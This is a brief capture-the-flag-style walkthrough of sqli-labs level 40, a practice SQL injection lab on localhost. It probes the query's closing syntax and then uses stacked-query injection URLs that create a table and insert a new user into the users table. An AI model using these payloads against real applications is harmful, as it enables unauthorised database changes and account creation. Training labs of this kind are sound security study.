sqli-labs (less-40)
Enter 40 levels, enter id=1
http://127.0.0.1/sql1/Less-40/?id=1' #无错误回显
Because there is no error echo, so we guess the way of closing one by one
http://127.0.0.1/sql1/Less-40/?id=1'--+ #回显错误
http://127.0.0.1/sql1/Less-40/?id=1')--+ #回显正常
Here we do not use union injection, we use stack injection attack
Create a table
http://127.0.0.1/sql1/Less-40/?id=1');create table test like users;--+
Created successfully
Create a new user
http://127.0.0.1/sql1/Less-40/?id=1');insert into users values(18,'icepeak','icepeak');--+
Created successfully